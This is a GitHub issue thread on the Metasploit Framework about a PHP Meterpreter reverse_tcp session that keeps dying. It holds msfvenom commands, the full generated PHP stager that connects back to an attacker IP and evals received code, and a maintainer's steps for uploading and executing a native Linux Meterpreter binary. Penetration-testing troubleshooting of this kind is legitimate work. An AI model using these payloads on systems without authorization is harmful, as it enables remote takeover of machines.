search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.98k stars 13.94k forks source link

PHP Meterpreter session is invalid and gets closed #7638

Closed githubnan123 closed 7 years ago

githubnan123 commented 7 years ago

Steps to reproduce

How'd you do it?

  1. msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=443 -f raw > /root/var/www/html/test.php

  2. msfconsole

  3. use exploit/multi/handler / set payload php/meterpreter/reverse_tcp

  4. set LHOST 192.168.0.186 / set LPORT 443

  5. exploit

  6. Then the victim(192.168.0.197) connects to 192.168.0.186:443/test.php Btw is the victim pc supposed to start a download? Because whenever i connect to this site, the pc starts downloading "test.php"

Expected behavior

What should happen? I should see the connection and be able to use commands like sysinfo and screenshot etc. The session should proably last longer than 15 sec :/

Current behavior

I DO see a new session and it open but here are the issues: i do not have the normal meterpreter commands like screenshot, sysinfo etc. but these instead: Core Commands **=============

Command                   Description
-------                   -----------
?                         Help menu
background                Backgrounds the current session
bgkill                    Kills a background meterpreter script
bglist                    Lists running background scripts
bgrun                     Executes a meterpreter script as a background thread
channel                   Displays information or control active channels
close                     Closes a channel
disable_unicode_encoding  Disables encoding of unicode strings
enable_unicode_encoding   Enables encoding of unicode strings
exit                      Terminate the meterpreter session
get_timeouts              Get the current session timeout values
help                      Help menu
info                      Displays information about a Post module
irb                       Drop into irb scripting mode
load                      Load one or more meterpreter extensions
machine_id                Get the MSF ID of the machine attached to the session
quit                      Terminate the meterpreter session
read                      Reads data from a channel
resource                  Run the commands stored in a file
run                       Executes a meterpreter script or Post module
sess                      Quickly switch to another session
set_timeouts              Set the current session timeout values
use                       Deprecated alias for 'load'
uuid                      Get the UUID for the current session
write                     Writes data to a channel**

And the session only lasts for about 15 sec(my focus is still at the meterpreter commands) It says Meterpreter session .. closed. Reason: Died all the time too And then i wanted to see what would happen if i used the command machine_id but then it said the it failed because the current session is closed and that was after 5 sec... Anyway, i am still most concerned about why i do not have the "normal" meterpreter commands.

System stuff

Kali Linux 2016.2

Metasploit version

4.13.1-dev 4.13.1-dev

How can i fix this? Thanks! Help is much appreciated!!

wchen-r7 commented 7 years ago

I can't say for sure, but this reminds me of: https://github.com/rapid7/metasploit-payloads/issues/95

githubnan123 commented 7 years ago

Hi @wchen-r7, i do not really know because the connection does get successfully established and is there for some seconds so not AS SOON as the session is found... But what about the commands? I mean how can i not have the "normal" commands like screenshot and sysinfo. Thanks for your time

And did you fix your issue by updating your php version,? Just to verify

wchen-r7 commented 7 years ago

PHP meterpreter doesn't necessarily have all the commands you see in Windows meterpreter. Personally, I would suggest you to upgrade to a platform-specific meterpreter (such as Windows or Linux) as soon as you get a session with the PHP meterpreter in order to access more functionalities.

My concern is more on the session dying part. I will at least try to see if I can reproduce this. I will let you know. Thanks!

githubnan123 commented 7 years ago

Well thanks!! But if you get it reproduced, can you then answer these questions:

  1. Is it normal that the browser starts downloading the test.php when going to [ip of attacker]::[port]/[file] - Does same thing happen to you?
  2. Does your sessions die fast?
  3. How can you upgrade to a platform-specific meterpreter AFTER you get a session?

Thanks! I really appreciate your time :))

wchen-r7 commented 7 years ago

I can answer 1 and 3 for you now.

For question 1, normally it should not be downloading the file. If it does, that tells me the web server is probably serving the browser some kind of inappropriate content type header? This may not be a big issue though as long as the web server is parsing PHP code. If you see the PHP code from the browser, then that's bad.

For question 3, um... well, this requires the session to stay alive first. I normally just generate an executable from msfvenom (for example: ./msfvenom -p linux/meterpreter/reverse_tcp LHOST=[MY IP] LPORT=4444 -f elf -o payload.bin), use the upload command to upload this binary to a directory you can write to, and then use the execute command to run it.

There is definitely more than one way to upgrade. If you are attacking Windows, you can also use the exploits/multi/script/web_delivery to upgrade to a different meterpreter.

OJ commented 7 years ago

1 tends to mean that the target web server isn't configured to run .php files with the PHP interpreter. This will happen if you upload a .php file to an IIS server running .NET, for example.

githubnan123 commented 7 years ago

Well, at least it seems to work even though that the browser it downloading the content(I am using chrome on the victim machine). @OJ you mentioned something about configure the server to run php? I simply uploaded the file to /var/www/html/ on my Linux. Should that not work? @wchen-r7, is this a good answer to 3 - http://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/ ? (Reminder: I am not asking you because I am too lazy to try it, I am just not home yet ) The content of the generated .php file located in www/html/ is: /*<?php /**/ error_reporting(0); $ip = '192.168.0.186'; $port = 6666; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();

Thanks so much for your time!!

wchen-r7 commented 7 years ago

@nichlaspro That script is good for upgrading from a shell to a Meterpreter. You actually have a different scenario: You're switching from Meterpreter to Meterpreter.

githubnan123 commented 7 years ago

You cannot go from meterpreter to meterpreter right? :/ That just confused me a little.. In the videos i have seen about going from shell to meterpreter they end up having the commands available like screenshot, which is what i want too.

Update: Ahhh i currently only have php-meterpreter and what i need is a platform-spcific-meterpreter in order to make the wanted commands available, i think i got the point now! But how can i upload another payload using that php client. I mean i have used php and not exe for a reason. What i can think of would be to make an exe payload using windows/meterpreter but php/meterpreter does not have any commands that can upload it to the victim pc and execute it so kinda hard to get to work i think...

wchen-r7 commented 7 years ago

Hi @nichlaspro, I tried to look into this issue, and I'm not reproducing the problem.

The following log shows what I did. Basically, I got a session with php/meterpreter/reverse_tcp, and I waited for about 2 minutes:

msf exploit(handler) > date
[*] exec: date

Thu Dec  1 15:38:07 CST 2016
msf exploit(handler) > curl -s http://192.168.146.184/test.php
[*] exec: curl -s http://192.168.146.184/test.php

[*] Sending stage (34117 bytes) to 192.168.146.184
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.184:54134) at 2016-12-01 15:38:17 -0600

^CInterrupt: use the 'exit' command to quit
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter php/linux  www-data (33) @ sinn3r-virtual-machine  192.168.146.1:4444 -> 192.168.146.184:54134 (192.168.146.184)

msf exploit(handler) > date
[*] exec: date

Thu Dec  1 15:40:02 CST 2016
msf exploit(handler) >

However, just because I'm not able to reproduce, doesn't mean the bug doesn't exist. If you'd like, please provide me with some target info, such as: OS, version of the OS, what web server, PHP version, etc. So I can recreate the test environment as close as possible.

wchen-r7 commented 7 years ago

@nichlaspro Also, here is an example of how you could switch from a PHP meterpreter shell to a Linux native. I'll be using 192.168.146.1 as an example for the attacker's IP:

  1. Create a linux meterpreter as an executable:
./msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.146.1 lport=4444 -f elf -o elf.bin
  1. In msfconsole, assuming you already have a PHP meterpreter session:
msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                             Connection
  --  ----                   -----------                             ----------
  1   meterpreter php/linux  www-data (33) @ sinn3r-virtual-machine  192.168.146.1:4444 -> 192.168.146.184:54134 (192.168.146.184)
  1. At the PHP meterpreter prompt, upload the binary that you generated with msfvenom. Notice I am uploading to /tmp:
meterpreter > cd /tmp
meterpreter > upload elf.bin 
[*] uploading  : elf.bin -> elf.bin
[*] uploaded   : elf.bin -> elf.bin
  1. Before you execute it, make sure the uploaded binary's permission is executable:
meterpreter > execute -f "chmod +x elf.bin"
  1. Now, you can execute it:
meterpreter > execute -f "/tmp/elf.bin"

[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
Process 6032 created.

[*] Sending stage (1495599 bytes) to 192.168.146.184
[*] Meterpreter session 2 opened (192.168.146.1:4444 -> 192.168.146.184:54136) at 2016-12-01 15:46:41 -0600
meterpreter >

The second session should be the native meterpreter:

msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                                                                  Connection
  --  ----                   -----------                                                                  ----------
  1   meterpreter php/linux  www-data (33) @ sinn3r-virtual-machine                                       192.168.146.1:4444 -> 192.168.146.184:54134 (192.168.146.184)
  2   meterpreter x86/linux  uid=33, gid=33, euid=33, egid=33, suid=33, sgid=33 @ sinn3r-virtual-machine  192.168.146.1:4444 -> 192.168.146.184:54136 (192.168.146.184)

Also, please note that since we are on a bug tracking system, in here we need to stay on topic for the bug (of your session dying). If you need further training on Metasploit, please use our community website, where there is also Metasploit devs assisting. Thanks! :-)

githubnan123 commented 7 years ago

Hi again! Thank you so much - Now i got an idea about to to upgrade the shell but look. I will now show you exactly what i do:

root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=4444 R > /root/Desktop/thisisphp.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 949 bytes

root@kali:~# mv /root/Desktop/thisisphp.php /var/www/html/
root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
    Is the server running on host "localhost" (::1) and accepting
    TCP/IP connections on port 5432?
could not connect to server: Connection refused
    Is the server running on host "localhost" (127.0.0.1) and accepting
    TCP/IP connections on port 5432?

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%% http://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.1-dev                          ]
+ -- --=[ 1605 exploits - 913 auxiliary - 275 post        ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.186
LHOST => 192.168.0.186
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.186:4444 
[*] Starting the payload handler...
[*] Sending stage (34117 bytes) to 192.168.0.186
[*] Meterpreter session 1 opened (192.168.0.186:4444 -> 192.168.0.186:35456) at 2016-12-02 09:11:46 -0500

meterpreter > sessions
[-] Unknown command: sessions.
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.186 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > sessions

Active sessions
===============

No active sessions.

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.186:4444 
[*] Starting the payload handler...
[*] Sending stage (34117 bytes) to 192.168.0.197
[*] Meterpreter session 2 opened (192.168.0.186:4444 -> 192.168.0.197:49625) at 2016-12-02 09:13:58 -0500
[*] Sending stage (34117 bytes) to 192.168.0.197

meterpreter > cd
[-] Unknown command: cd.
meterpreter > cd /tmp
[-] Unknown command: cd.

[-] Meterpreter session 2 is not valid and will be closed

[*] 192.168.0.197 - Meterpreter session 2 closed.
meterpreter >

So here are my final questions(i guess) that cover the still ongoing issues.

  1. On my windows pc it is downloading the file instead of just showing the content and i have to type the port in order to even make it start downloading, is that optimal? Look: https://s18.postimg.org/4hkabwxjt/look.png

  2. So now the download of the php has started and a meterpreter session has been opened but again it was only up for about 10-20 seconds before it closed. Can that have something to do with this weirdness upon connecting to the php file on my windows pc? How can i fix this then?

  3. As you can see i tried to use the cd command in the meterpreter but then it said that it is an unknown command? I am really doing the exact same thing as other people but it just does not seem to work? (sad story)

Something looks very wrong to me, can you help? That would really make my day :) (i am using chrome on my windows 8 machine and php version 7.0.12-1 on my linux btw i have not started any services or anything) Thanks, your time is much appreciated

wchen-r7 commented 7 years ago

Hi @nichlaspro,

For question 1: The URL looks a little weird for me. You are connecting to http://192.168.0.186:4444/thisisphp.php.... so does that mean your web server is listening on port 4444? Normally web servers listen on port 80, so you would call your PHP meterpreter like this: http://192.168.0.186/thisisphp.php. Could you please clarify on that a little?

For question 2: I don't know for sure, because I'm unable to reproduce this problem. It works fine on my end, and I also tested it on PHP 7. Is it possible you're not on the latest master? Could you please try git clone https://github.com/rapid7/metasploit-framework.git and use that Metasploit Framework instead? That should give you the latest.

For question 3: Yeah, so when you receive a meterpreter connection, framework has to load stdapi to get the commands. That looks like it didn't. That means the session was not valid for some reason. I think if question 2 is resolved, we should automatically resolve question 3 as well.

githubnan123 commented 7 years ago

Okay first of all, thank you so much for taking time to help me! I know that it is not optimal that i have to write the port in the victim browser but whenever i do that the browser starts downloading the actual php file. When i do type 192.168.0.186/payloaddd.php in the victim browser, it says "This site can't be reached". Like if there is some sort of issue in making the php file reachable. I have moved the generated php file to /var/www/, which i think is what you should do but i does not seem to work.

I tried updating and the metasploit framework but it did not really seem to help much. Here is what i did:

root@kali:~# clone https://github.com/rapid7/metasploit-framework.git
bash: clone: command not found
root@kali:~# git clone https://github.com/rapid7/metasploit-framework.git
Cloning into 'metasploit-framework'...
remote: Counting objects: 382032, done.
remote: Compressing objects: 100% (99/99), done.
remote: Total 382032 (delta 45), reused 1 (delta 1), pack-reused 381932
Receiving objects: 100% (382032/382032), 282.55 MiB | 5.73 MiB/s, done.
Resolving deltas: 100% (277211/277211), done.
root@kali:~# sudo msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.186 LPORT=4444 R>payloaddd.php
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 949 bytes

root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
    Is the server running on host "localhost" (::1) and accepting
    TCP/IP connections on port 5432?
could not connect to server: Connection refused
    Is the server running on host "localhost" (127.0.0.1) and accepting
    TCP/IP connections on port 5432?

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)

Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................

Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing

Validate lots of vulnerabilities to demonstrate exposure
with Metasploit Pro -- Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.1-dev                          ]
+ -- --=[ 1605 exploits - 913 auxiliary - 275 post        ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.186
LHOST => 192.168.0.186
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set URIPATH /upload/payloaddd.php
URIPATH => /upload/payloaddd.php
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.186:4444 
[*] Starting the payload handler...
[-] Exploit failed: Interrupt 
[*] Exploit completed, but no session was created.
msf exploit(handler) > set uripath /
uripath => /
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.186:4444 
[*] Starting the payload handler...

So nothing happened from then because when i typed in 192.168.0.186/payloaddd.php in the victim browser, it said "This site can't be reached". But when i typed 192.168.0.186:4444/payloaddd.php, the browser started downloading a php file and this is where the invalid session thing begins i think. Anyway, when i start msfconsole it says:

root@kali:~# msfconsole
[-] Failed to connect to the database: could not connect to server: Connection refused
    Is the server running on host "localhost" (::1) and accepting
    TCP/IP connections on port 5432?
could not connect to server: Connection refused
    Is the server running on host "localhost" (127.0.0.1) and accepting
    TCP/IP connections on port 5432?

Can that have anything to do with why it is not working? Update to the last part: Just found out that it said "failed to connect when start msfconsole because that i had not started the postgresql service... Anyway, that does not solve the problem about php and all that.

wchen-r7 commented 7 years ago

Hi @nichlaspro, after you clone Metasploit Framework, make sure you cd to the directory, and then execute ./msfconsole, and not msfconsole. I suspect there are two different Frameworks installed on the machine.

githubnan123 commented 7 years ago

You are right, there are two. Let me just try to fix some installations errors and then i will see what the outcome is :)))

githubnan123 commented 7 years ago

Okay so i successfully isntalled it and mounted it from home/metasploit-framework and then ran ./msfconsole. Then i set up the lhost and port, payload, and exploited... but now i tried it on the actual attacker machine(linux) where i typed the URL 192.168.0.186/payloaddd.php and firefox said this

Unable to connect

Firefox can't establish a connection to the server at 192.168.0.186. The site could be temporarily unavailable or too busy. Try again in a few moments. If you are unable to load any pages, check your computer's network connection. If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the Web.

Again the payload php file is located in /var/www/. What is going on?

What i did:

Use `bundle show [gemname]` to see where a bundled gem is installed.
Post-install message from aruba:
Use on ruby 1.8.7
* Make sure you add something like that to your `Gemfile`. Otherwise you will
  get cucumber > 2 and this will fail on ruby 1.8.7

  gem 'cucumber', '~> 1.3.20'

With aruba >= 1.0 there will be breaking changes. Make sure to read https://github.com/cucumber/aruba/blob/master/History.md for 1.0.0
root@kali:~/metasploit-framework# ./msfconsole

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt

       =[ metasploit v4.13.4-dev-f45b0e3                  ]
+ -- --=[ 1607 exploits - 914 auxiliary - 276 post        ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler/
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.186
LHOST => 192.168.0.186
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse TCP handler on 192.168.0.186:4444 
[*] Starting the payload handler...

Thanks again

void-in commented 7 years ago

@nichlaspro The reason you are able to connect to 4444 is because that is the port the handler is listening on. When you connect to it, the handler assumes that it has been contacted by the stager and give you the meterpreter stage. This is not what you want.

First thing you need to verify is that you are actually able to connect to the web server. Make sure you can connect to http://192.168.0.186. You should receive something like "It works!" or a GET request in the HTTP server log. When that is done, placing the PHP file in the /var/www/ directory and calling it from the browser is straight forward.

If you are not able to connect to the web server in the first place, I am afraid it is not a Metasploit issue but rather something related to your web server setup.

githubnan123 commented 7 years ago

How to mark this as solved?

h00die commented 7 years ago

just click "Close" where you respond.

wchen-r7 commented 7 years ago

Closed for ya :-)